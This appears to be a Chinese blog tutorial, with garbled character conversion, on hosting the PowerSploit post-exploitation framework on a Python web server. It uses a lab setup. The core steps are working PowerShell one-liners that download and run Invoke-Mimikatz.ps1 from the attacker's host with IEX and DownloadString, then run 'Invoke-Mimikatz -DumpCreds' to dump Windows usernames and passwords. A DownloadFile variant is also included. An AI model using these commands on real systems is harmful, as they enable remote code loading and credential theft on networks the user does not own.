天天看點

利用python搭建Powersploit powershell腳本站點

powershell腳本站點的搭建

一、Powersploit

Powersploit是一款基于powershell的後滲透(Post-Exploitation)架構,內建大量滲透相關子產品和功能。

下載下傳powersploit

github位址: https://github.com/mattifestation/PowerSploit

二、搭建站點(這裡用python自帶的web服務,也可以用phpstudy等搭建站點)

1.實驗環境:

服務端:win7(python3.7)

用戶端:Windows server 2008

用戶端有python環境(用python的web服務),確定用戶端能連通服務端

2.實驗步驟:

服務端:(win7)

1.把下載下傳好的powersploit,解壓

  

利用python搭建Powersploit powershell腳本站點

2.安裝python,cd到PowerSploit-master目錄裡面,并開啟web服務

  python -m http.server 80    #python3.7

利用python搭建Powersploit powershell腳本站點

3.本地測試python的web服務是否開啟

利用python搭建Powersploit powershell腳本站點

用戶端:(windows server2008)

用戶端測試:

利用python搭建Powersploit powershell腳本站點

可以看到通過用戶端的浏覽器通路到搭建的站點了

下面開始進行powersploit内網滲透神器其中的Invoke-Mimikatz.ps1腳本檔案進行舉例

在用戶端加載服務端腳本并執行(IEX遠端下載下傳腳本執行)

powershell加載iex(New-Object Net.WebClient).DownloadString('http://192.168.10.4/Exfiltration/Invoke-Mimikatz.ps1”)

 執行: Invoke-Mimikatz -DumpCreds

       效果圖如下:

利用python搭建Powersploit powershell腳本站點

  從上圖可以看到已經擷取到本機(windows server2008 的使用者名和密碼) 

Tips:還有一種可以直接把腳本檔案下載下傳下來的方式

$client=new-object System.Net.WebClient

$client.DownloadFile(‘http://192.168.8.135/Exfiltration/Invoke-Mimikatz.ps1’,’C://Mimikatz.ps1’)

也可以直接運作腳本檔案來進行内網攻擊,但這種方式并不推薦,因為系統出于安全考慮

powershell預設是不能執行本機上的.ps1檔案的,這是因為ps有預設的安全限制